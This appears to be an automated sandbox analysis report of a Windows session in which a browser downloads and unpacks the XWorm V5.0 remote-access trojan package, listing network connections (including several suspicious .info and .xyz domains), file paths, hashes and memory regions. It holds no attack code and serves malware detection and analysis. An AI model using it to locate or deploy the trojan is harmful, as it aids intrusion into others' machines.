"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4892.1.613910021\2103697244" -parentBuildID 20221007134813 -prefsHandle 2252 -prefMapHandle 2248 -prefsLen 20783 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f78fdc1-aacd-40f9-b6f1-9644978da0d3} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" 2264 24b15e03258 socket

Network

Country Destination Domain Proto
FR 51.91.30.159:443 www.upload.ee tcp
US 8.8.8.8:53 159.30.91.51.in-addr.arpa udp
FR 51.91.30.159:443 www.upload.ee tcp
BE 104.68.81.91:443 s7.addthis.com tcp
BE 104.68.81.91:443 s7.addthis.com tcp
AT 13.32.11.224:443 du0pud0sdlmzf.cloudfront.net tcp
US 8.8.8.8:53 8.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 224.11.32.13.in-addr.arpa udp
US 8.8.8.8:53 117.110.32.13.in-addr.arpa udp
US 104.21.55.237:443 ringashewasfl.info tcp
DE 52.222.236.30:443 tentioniaukmla.info tcp
GB 18.245.253.108:443 funjoobpolicester.info tcp
DE 52.222.236.30:443 tentioniaukmla.info tcp
US 172.67.220.203:443 pogothere.xyz tcp
US 172.67.220.203:443 pogothere.xyz tcp
US 172.67.220.203:443 pogothere.xyz tcp
GB 157.240.214.35:443 www.facebook.com tcp
BE 142.251.173.84:443 accounts.google.com tcp
BE 142.251.173.84:443 accounts.google.com tcp
BE 142.251.173.84:443 accounts.google.com udp
US 8.8.8.8:53 35.214.240.157.in-addr.arpa udp
US 8.8.8.8:53 84.173.251.142.in-addr.arpa udp
US 8.8.8.8:53 108.253.245.18.in-addr.arpa udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
GB 18.244.140.102:443 ghabovethec.info tcp
DE 18.66.122.3:443 madehimalowbo.info tcp
DE 18.66.122.3:443 madehimalowbo.info tcp
GB 142.250.200.33:443 tpc.googlesyndication.com tcp
NL 139.45.197.239:443 dukirliaon.com tcp
NL 139.45.195.8:443 my.rtmark.net tcp
NL 139.45.197.236:443 yonmewon.com tcp
GB 142.250.200.33:443 tpc.googlesyndication.com udp
GB 142.250.178.4:443 www.google.com tcp
US 8.8.8.8:53 236.197.45.139.in-addr.arpa udp
BE 64.233.166.155:443 stats.g.doubleclick.net tcp
NL 212.117.190.201:443 sr7pv7n5x.com tcp
BE 104.68.85.7:443 best.aliexpress.com tcp
BE 104.68.85.7:443 best.aliexpress.com tcp
NL 139.45.195.253:443 datatechone.com tcp
NL 139.45.195.253:443 datatechone.com tcp
N/A 224.0.0.251:5353 udp
BE 104.68.85.7:443 best.aliexpress.com tcp
US 163.181.154.234:443 g.alicdn.com tcp
BE 23.14.90.72:443 time-ae.akamaized.net tcp
BE 104.68.85.7:443 best.aliexpress.com tcp
BE 2.21.16.52:443 ae01.alicdn.com tcp
BE 2.21.16.52:443 ae01.alicdn.com tcp
DE 47.246.146.12:443 acs.aliexpress.com tcp
BE 23.41.178.97:443 ae04.alicdn.com tcp
US 8.8.8.8:53 72.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 97.178.41.23.in-addr.arpa udp
US 8.8.8.8:53 12.146.246.47.in-addr.arpa udp
SG 47.246.110.44:443 ae.mmstat.com tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 34.111.35.152:443 cdn4.cdn-telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
BE 2.17.196.83:443 www.bing.com tcp
BE 2.17.196.83:443 www.bing.com tcp
BE 2.17.196.59:443 r.bing.com tcp
BE 2.17.196.59:443 r.bing.com tcp
BE 2.17.196.138:443 www.bing.com tcp
BE 2.17.196.138:443 www.bing.com tcp
NL 40.126.32.72:443 login.microsoftonline.com tcp
US 13.107.5.80:443 services.bingapis.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 140.82.113.22:443 collector.github.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 140.82.113.22:443 collector.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 22.113.82.140.in-addr.arpa udp
BE 2.17.196.138:443 www.bing.com tcp
LU 31.216.144.5:443 mega.nz tcp
LU 31.216.144.5:443 mega.nz tcp
LU 31.216.144.5:443 mega.nz tcp
NL 66.203.127.13:443 eu.static.mega.co.nz tcp
NL 66.203.127.13:443 eu.static.mega.co.nz tcp
LU 66.203.125.13:443 g.api.mega.co.nz tcp
LU 66.203.125.13:443 g.api.mega.co.nz tcp
NL 66.203.127.13:443 eu.static.mega.co.nz tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
LU 89.44.168.79:443 gfs270n369.userstorage.mega.co.nz tcp
LU 89.44.168.79:443 gfs270n369.userstorage.mega.co.nz tcp
LU 89.44.168.79:443 gfs270n369.userstorage.mega.co.nz tcp
LU 89.44.168.79:443 gfs270n369.userstorage.mega.co.nz tcp
LU 89.44.168.79:443 gfs270n369.userstorage.mega.co.nz tcp
LU 89.44.168.79:443 gfs270n369.userstorage.mega.co.nz tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.210:443 api.github.com tcp
GB 20.26.156.216:443 codeload.github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.210:443 api.github.com tcp
BE 2.17.196.130:443 www.bing.com tcp
US 8.8.8.8:53 130.196.17.2.in-addr.arpa udp
N/A 127.0.0.1:51811 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f2dc80f5403feb8461b7ffa09890d6a0
SHA1 d5b61e6d672e7e71571e0132e21cead181da8805
SHA256 eadeadba37eed18e5acba408d7e076270b00403fed372b77164577232232428a
SHA512 5e2119529b99b76be105c43714e4b9977ee2147172c1c44e92bd9b41fa7a66f55d4073c864aac668a912aff2898bd216fb38f2fe34ef65de69ad12965218caf5

\??\pipe\LOCAL\crashpad_2160_KCVXDCQFUWURDSDV

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 5c48e8b68231fb5b2d7f1188b930bc0e
SHA1 1822aef5da8fdd47626fb91afcf79a2be175a325
SHA256 c3b287c29eaa57166b2ab1ba9bd0aaced13cc2f946a04b8d708ac429187fe944
SHA512 2bd09b83e44e0104fbe080a8573690217dc9fbf7fd59ff25a1a9e9ebd2d87ac533f9b99350773d081a7e748b39657115a13e94538b153bceb13ecdfc4672a0f8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c41d23721bad9255ed26b138f6b1cbba
SHA1 7020f0eb273dbeb42d472a25badb6557d9e02b15
SHA256 f95d74b34d5b887c67b66ae0510bf3faaa38381e04e84619631c9386c2459260
SHA512 b9437016a1a19f8408473488b0302d4adce5171878b802e8f79a46bae0def5d9d53c8aac2cc20a705fe51257e3cc0568fdd1f248afa9e5295bf17311c1f6eb9d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\373df43e-bfd4-4d7b-a20d-f210929b538c.tmp

MD5 7e1a95c1e4c771fe0ced19137452e0fe
SHA1 1aaa180ed7557e6493fb466a907a585a7faedda4
SHA256 e2fa290564dbacfbfba7b626b86f712a9c5a9eda76db085d2d643c324afcd5e1
SHA512 18add08c49d19657b107e3d3bd59b50536c28d9274a77c8a2b507e4017038116c86e30da1db37f60995168c4d7c85f40fb904e40d517ff9b8d0293db4ddc9456

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 90745ba12ed4858f60cad1e677d04739
SHA1 0e8ea63730608b1b461734abdde6484ad5f77b17
SHA256 130e29cae91752caddeaeb143107db39612b12e00465a4a8fc7f418d1d4afbc5
SHA512 1c50a0262818a4aecca4688265bcd6b4e07b90f6f6b4d0e20d3b930782c25fc1c1238c9cf3e6281bbaebbc68fba62d07cdd5f5871afc06a55d0cdd8020fe0b91

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 8b1b2ef910fab412d306407809d2eadd
SHA1 a8351618ea4519f3c028d85e80604f7dbd4d2486
SHA256 6c64da7cd90b0acf7669bfca44ab4dad9f002cae69df878b942ccf6c17a3e820
SHA512 b5e3add775f05689e7dadfdea450c9ee81ad7bad07acc513627acebee524eea69f9a26668aa30a7142c36a7df19efa7d3c8a3405b39bb252d504ce82454aa6df

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 05e8a1fe7bac0a201b5ae4e13ca2de06
SHA1 28b5c4a57cc97dc6ee2a40488edc977ee751ae82
SHA256 6cd880a27d48092bf981c248611a10ac4cccfc8bae3395da183160b6b7050fa0
SHA512 6b949604ef98a4f724e188dbac5df0d2c9ff4f1b5762c2cb19549003f6f063b5a4245894c54eaf7c5576217b7d4c4678f0f4af4590152006fda9d54b4118c7c6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 155556fa124bb31b81eb1d3b499737cb
SHA1 efdea17e34df67e70fc64404845f3c6d6f55099c
SHA256 9196d467880bf46a93c259b655f172d617a0c6bb1ad47a242e1c5c5c4e516934
SHA512 228f0ed9f0c42a14bf113bf7b7093c8bbb66284b374e2c433feea25be694c7d586818b3a8a8377f24a323b26a3f6dc0bd476f92450ea08c01c777bc27642960f

C:\Users\Admin\Downloads\XWorm-V5.0.rar:Zone.Identifier

MD5 fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1 d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256 eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512 aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

C:\Users\Admin\Downloads\XWorm-V5.0.rar

MD5 f778fc725ed79c15d3ad889e7a33bea8
SHA1 6dfce5a46e080fb2436b09a5ed68b98b4c28c17d
SHA256 c2a1b97d657542e949496bc96e5a6c4e0beb101a629e7591519d0cb7e906dbfa
SHA512 ecb5365ae67963d1d246851a852fda53d7ed100e99377d340124b432a3d502044d4ae3abf2e67f7b1224dd08e42e45906d173fcf0e667ec1f052102a4196745a

C:\Users\Admin\AppData\Local\Temp\7zE07F520A8\XWorm-V5.0\Icons\icon (15).ico

MD5 e3143e8c70427a56dac73a808cba0c79
SHA1 63556c7ad9e778d5bd9092f834b5cc751e419d16
SHA256 b2f57a23ecc789c1bbf6037ac0825bf98babc7bf0c5d438af5e2767a27a79188
SHA512 74e0f4b55625df86a87b9315e4007be8e05bbecca4346a6ea06ef5b1528acb5a8bb636ef3e599a3820dbddcf69563a0a22e2c1062c965544fd75ec96fd9803fc

C:\Users\Admin\Desktop\XWorm-V5.0\XWorm V5.0.exe

MD5 227494b22a4ee99f48a269c362fd5f19
SHA1 d32d08cf93d7f9450aee7e1e6c39d9d83b9a35c9
SHA256 7471ff7818da2e044caf5bd89725b6283ed0304453c18a0490d6341f3a010ca2
SHA512 71070e6b8042fa262ce12721e6c09104aec0a61ac0d6022f59f838077109b9476a5c1f8409242d93888eff6d36f0ee76337481fefe6f05e0f1243efbf350bee0

C:\Users\Admin\Desktop\XWorm-V5.0\XWorm V5.0.exe.config

MD5 66f09a3993dcae94acfe39d45b553f58
SHA1 9d09f8e22d464f7021d7f713269b8169aed98682
SHA256 7ea08548c23bd7fd7c75ca720ac5a0e8ca94cb51d06cd45ebf5f412e4bbdd7d7
SHA512 c8ea53ab187a720080bd8d879704e035f7e632afe1ee93e7637fad6bb7e40d33a5fe7e5c3d69134209487d225e72d8d944a43a28dc32922e946023e89abc93ed

memory/2152-372-0x000001F18AC10000-0x000001F18B682000-memory.dmp

memory/2152-373-0x00007FF9976D0000-0x00007FF998192000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 092c4d94505d420d0d647f78b7b4cf67
SHA1 d5c8444709e89874974e81ae0ff977691582c941
SHA256 9d0b9429cbaac911fea15ccdfa3b38076bfca568f138b7d5c9f22b6dfff62bd0
SHA512 c6bbcda130189b439cd34d7457b9bae83e9466ffe0ed5f0ac14844e17cf6768b04c89b65ddb4e15c9a02698929663d94045c52faedf911833def9ab9b57bc6f7

C:\Users\Admin\AppData\Local\Temp\CE8806DA1EF0F1BB553DFF4FC5E9FCCD\CE8806DA1EF0F1BB553DFF4FC5E9FCCD.dll

MD5 a239b7cac8be034a23e7e231d3bcc6df
SHA1 ae3c239a17c2b4b4d2fba1ec862cf9644bf1346d
SHA256 063099408fd5fb10a7ea408a50b7fb5da1c36accc03b9b31c933df54385d32b8
SHA512 c79a2b08f7e95d49a588b1f41368f0dd8d4cd431ad3403301e4d30826d3df0907d01b28ef83116ad6f035218f06dbdf63a0f4f2f9130bba1b0b7e58f9fc67524

memory/2152-390-0x000001F1A6430000-0x000001F1A6440000-memory.dmp

memory/2152-391-0x000001F1A6440000-0x000001F1A6FF6000-memory.dmp

C:\Users\Admin\Desktop\XWorm-V5.0\Guna.UI2.dll

MD5 bcc0fe2b28edd2da651388f84599059b
SHA1 44d7756708aafa08730ca9dbdc01091790940a4f
SHA256 c6264665a882e73eb2262a74fea2c29b1921a9af33180126325fb67a851310ef
SHA512 3bfc3d27c095dde988f779021d0479c8c1de80a404454813c6cae663e3fe63dc636bffa7de1094e18594c9d608fa7420a0651509544722f2a00288f0b7719cc8

memory/2152-393-0x000001F1A7360000-0x000001F1A7554000-memory.dmp

memory/2152-395-0x000001F1A6430000-0x000001F1A6440000-memory.dmp

memory/2152-394-0x000001F1A6430000-0x000001F1A6440000-memory.dmp

C:\Users\Admin\Desktop\XWorm-V5.0\GeoIP.dat

MD5 8ef41798df108ce9bd41382c9721b1c9
SHA1 1e6227635a12039f4d380531b032bf773f0e6de0
SHA256 bc07ff22d4ee0b6fafcc12482ecf2981c172a672194c647cedf9b4d215ad9740
SHA512 4c62af04d4a141b94eb3e1b0dbf3669cb53fe9b942072ed7bea6a848d87d8994cff5a5f639ab70f424eb79a4b7adabdde4da6d2f02f995bd8d55db23ce99f01b

memory/2152-406-0x000001F1A6430000-0x000001F1A6440000-memory.dmp

memory/2152-414-0x00007FF9976D0000-0x00007FF998192000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 2e1900ae4ac5fc19f5af9e13519f200d
SHA1 0b0cef610338223ae87c3e482f6e45bdc6bb1255
SHA256 6c75c959d394566ce5eac049b363d7eb1af50ed2f77140f03360a28376357a08
SHA512 7ba5815e5a3b3b26ced0499c1e9faf73157c52054f2b081ebef2622da9a353664736887fc0b981ee43e6e1e63536f28b52bd933d45e64a6564fb28e55cbcfecd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe594368.TMP

MD5 646c380a3bb8335d5a4bee4ea21c3d66
SHA1 0c2dbbe06605af50ff116639c177e6a5ed09448a
SHA256 66324ec9edcf94a649bf7b81fe33cb383b8e4c83069812730e0358dc336ad380
SHA512 e7260a2c09ae5ec6b31abf91af3bc958d5a74e6903e7a34e05ccd6cffdc0276b7f4c2bb8e7e9ed35ee4af0403554cba574a5b4701b46cf1c24bd8e053bc98644

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 41ee12a0c0665dd412d496e724b9b97d
SHA1 d4a0695ffd32ec8f9a6f6ebc65d00db8cf688667
SHA256 9fa65e9406264347954f8869f1f5e2090a117a94e2b5f6a88c9ca0f93d5dc99f
SHA512 dfa1974be77ab9aaab7e82d437c4d53e77a95a3852141253ba98b404a209908dbc46b0dd8447dcbe040560e7d39dbb77231dd27c07fc2b0bc1f6e3cf1c005f53

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 3ebdcfcec133eb0fe1867d92d2c2d785
SHA1 9b710b2527c197b0192fadef5847788765e6fd8d
SHA256 28e510a8db3a4ad1a2e58255661902f9d4ec4c1de8394683412961e2d7d68f83
SHA512 b08808f22ff3c66d82f19a76ddc0fb69e673bc6bc3888b361a20f63a14a333c4dc2aaabfffb808fabf988ffc58d721237cc20929be2f75c9adc81c6bd6508cc2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\264cb79d-b27d-4afc-b021-0971fe5e6c5a.tmp

MD5 eba03ac5efe00b93d30a6d97cbc7a7c1
SHA1 6639b6c91cb1f34d338b28c7d00d0fb9f7968f1a
SHA256 4b105a68c4acb64ef1bcc1bc4c9a4766d88a796f88c19df3dbb64fe5634cd2cb
SHA512 96647447596a4eb901fcb0eec46b95e3e568092ff7de07979c56cd201d5678962766b6625f9ab8d5c0a6c485539bef2348c5643b1302292b006c5a4aa0b6f2ce

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5de0e99eae014295eb397a6492e9cfda
SHA1 09dfbbe80d2bebab37214501e124beb5c8e05d07
SHA256 80eeb8d69c08833e36c2ac9d756a7b3650638f3fc39e02e8c7f8f645fc8ef027
SHA512 90eefc59f1912b052feea6514a9f92f34ff1a95d67783e5d4ef22c44b6317cc89cd5ca8c3d19bb554ca11eee5f8c65e2d842a8da9cc3521c44f2c6af7e3c4755

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 25c2ed8ba7c0b9f1c5f3387147be01e5
SHA1 873f67f429fa4ba51643042912015858b9765b6f
SHA256 e305aacb6af69df860140bfde9c9d4691a2d43cecbe6fd0b743e36e53f8b3d08
SHA512 ae9193124bfa1ddbf4210b7a95ff8be70241a5a31b96d376846dc6c4124098bad76046a35a42b53ecf058ce50a6a513909ffc28137713904b22b52e79d949758

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8f2f16c9a8706fb56aed06ca5b958b73
SHA1 29e2e18cd5c6922b9cee14da1e79fc96a372162c
SHA256 c2b022a50d3190360d97126146df7db3090aa5cb8fee4a9a46239290c29b364b
SHA512 175592987f52e02d79673d2190294faa02defb3e99c8f5ee72363add4d1e4b7d0f020a3c818a32e77dc0d5b796bfe0005d81b7c6e870d090baa9070a5f19b64b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 47a1684d0812e0421282751aeea64706
SHA1 24b0261627bd7e3270e7485541a9f90acef845d6
SHA256 45430932684ac18b00ff56e2bf6fbdeea9491f3dbaede1d6bd8ee95329b238d7
SHA512 23681954773a93abb8428a0d3295dee772a1d2079bfff98451c5773dacd05c2a245e172c28473ce3d11d49a50ab8bc273b5ee4221490ee77f382609b016eaae5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

MD5 2e86a72f4e82614cd4842950d2e0a716
SHA1 d7b4ee0c9af735d098bff474632fc2c0113e0b9c
SHA256 c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f
SHA512 7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

MD5 dfa06a2cf726c1772e54d6f0e7b57fe8
SHA1 6c843917d374a2f5f4fbc2e3cb620737c56f864f
SHA256 a99b0f8a4e209bf564f0570d79edc20f08244edae0a50da214ff32afc56d89fc
SHA512 046af2d7537f6985db4c55368d5d0865713dd955ef094ff3743b0899e8699edc17029c29bd15fdabe4f1258fd1e502372f0073bd2ed0e8d5060e384c0a397e2f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013

MD5 d2d55f8057f8b03c94a81f3839b348b9
SHA1 37c399584539734ff679e3c66309498c8b2dd4d9
SHA256 6e273f3491917d37f4dbb6c3f4d3f862cada25c20a36b245ea7c6bd860fb400c
SHA512 7bcdbb9e8d005a532ec12485a9c4b777ddec4aee66333757cdae3f84811099a574e719d45eb4487072d0162fa4654349dd73705a8d1913834535b1a3e2247dc6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

MD5 d6b36c7d4b06f140f860ddc91a4c659c
SHA1 ccf16571637b8d3e4c9423688c5bd06167bfb9e9
SHA256 34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92
SHA512 2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015

MD5 56d57bc655526551f217536f19195495
SHA1 28b430886d1220855a805d78dc5d6414aeee6995
SHA256 f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4
SHA512 7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

MD5 b38fbbd0b5c8e8b4452b33d6f85df7dc
SHA1 386ba241790252df01a6a028b3238de2f995a559
SHA256 b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd
SHA512 546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

MD5 4aa32374606cca47f1cc7f0c9f4afa93
SHA1 7d7dedb3e23b5c5d8608ee9fea570806873f3538
SHA256 667571588960cbdca04cf7842cc1e06ae0abbb73fc3e4bf1f501ce6d01920519
SHA512 68309d5c866c958ef8d490e9e00876eada4b4b6bebac22147b245140893b989a4fe85f71d3bac06c57dca3767116478ddc02f74ec6068271d27393c650874380

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 6f54da55773f4c2d69d0f2ca257d7775
SHA1 ce2ebbcd3befe4838f1ea36279dc3c029d851861
SHA256 16912f79cfa920371a6affc97b29c7cef839ee3be5830f40777293d85a18c6ac
SHA512 b19599335255fe5514ae597d4aa22c236f7084f90695f16155c15b64904215969343a1a131bef1768d671c0dc97672543c1c96f276f6d43c63ea5434a19ac5d8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 25b3cf308032f7efeead7724ee87e95d
SHA1 140da5a9c9b610858ee3def295074460ec236079
SHA256 fadc09f2806250063384630f0aa9dd1c9af671717f5d77db046dbbd0058aed93
SHA512 b2ce528578facfd72b434b98c1bb7a0efe4f7ac5c936b12c6b02b33d5c309cb22b61686e4b2b3e55a329c544d232d48d30f9d85a0d7601869dc52dccdc1fe206

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4386fc0f8b5e1607a74a1343ddd627de
SHA1 f34baa4414344aead32e4cd6cabb3cda43913d1f
SHA256 93ebd38ec71be1a58f33c70b0ea9b3d0ece081e57eb7514269190cfeb5db395f
SHA512 42868b56fb9413a29db8eb6f5256c3b4f5dd05063dd76208d4b8df7379604796d08109c4af83f76ee7dc1b85a599afa35c8bb1fd5d69e58d133efca7257d18ee

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 55f3e6c7f6dd97ef8d39b0255d256c09
SHA1 681257bfd018e7c0e6eeae02f67a477fdbc048f9
SHA256 add5758aaf5fc4f7a708597e8958278ea413beb2b3dfca45769f641896eddfca
SHA512 3064912b7cc0167d65d47c7da3397bafa6a3b97e4c50904b808c4267aa2bc4f25d327e941af7488c9cc0b41b3e5b9ba897d2420a99dd4cfe443f39b4eb03f600

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f36886a4fc6bd878e54668b64d2d0c4a
SHA1 50a6317bc928618a9accc853cc1cf4c270f9890e
SHA256 44271c21737794276e18d3cc441e2f6545bb6a3e38955747ff4836c5b10f7a9f
SHA512 604782953f740aaa8f7c7288aa2db3f0cbbb1827e59d9252bb9e361ea6996533ba5a298f50abafa81816b371e9d358fe89b674ad7aed827218d6e5bf83298010

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 08f876b3793678c359184c38e409c9e6
SHA1 b61ea90c2ccd4e98f53a25ebf409e9c7c739ade5
SHA256 8a4391c8f40563e144be0c9b92653a22d8e4a78ddccd27632b38801ce049219f
SHA512 b316a8a70a6ca420e9fc70db38251dc7e22134f0fdd4ad1ff6f19870d6a95a4865e2678ca15824335ac0b32af01f9cf3497d39afa94935b004a9ca3ff249ce0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5a9b86.TMP

MD5 624347ba960d10dbaae821e76991f730
SHA1 995d3319e18da12f891ac859f3b172cb75ebc15c
SHA256 d38fad9157cbc905198c3ca9ddcdf78e4f4b84f1d8010c839d11e4d3a557268b
SHA512 d9ef8bd7859c6b1c7b039e1fce0ebe6887cff3cde701f873b177a06fb983f4af2cd986a88b1acc22560086d528c52835107b586069c35c1545d97147c363db40

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 e3aada23881aae41a83049f8c6531af6
SHA1 a8ea32df70962c20e12cef45ab67240812bdfd97
SHA256 badd2c285fd879ca6496e4a5ddceec126988bc50be880f63527d3c84eab3000c
SHA512 dace52a15c15648adb218cae3b94f8bf1360a7e9a4e3ce42fbb0dc591aeb620e1907df03232d00513fd0e33cfca20ef5b5548308a11ebe4b69befbd13f97f7c9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 607cb351eb2a336911452b5f9000ab94
SHA1 5d140f3cbe56a2cef55bf9f12c969bbe26c3c061
SHA256 c08f84a5f935b12666f6704f16131681a638647ba9c9e39bc55e8326a4c54c6b
SHA512 0f8f6c10ae4984a0aa04903ce35887bf51594e5641bb72e2f36b2f6c8859a0a095648119f59707f54b50c74134269430b58f2121bc4260510cd765f791e85bb4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 fce05213003b586ee0ca0835464ed82c
SHA1 cea63f5817e28935a477d8d97f685537f7d77150
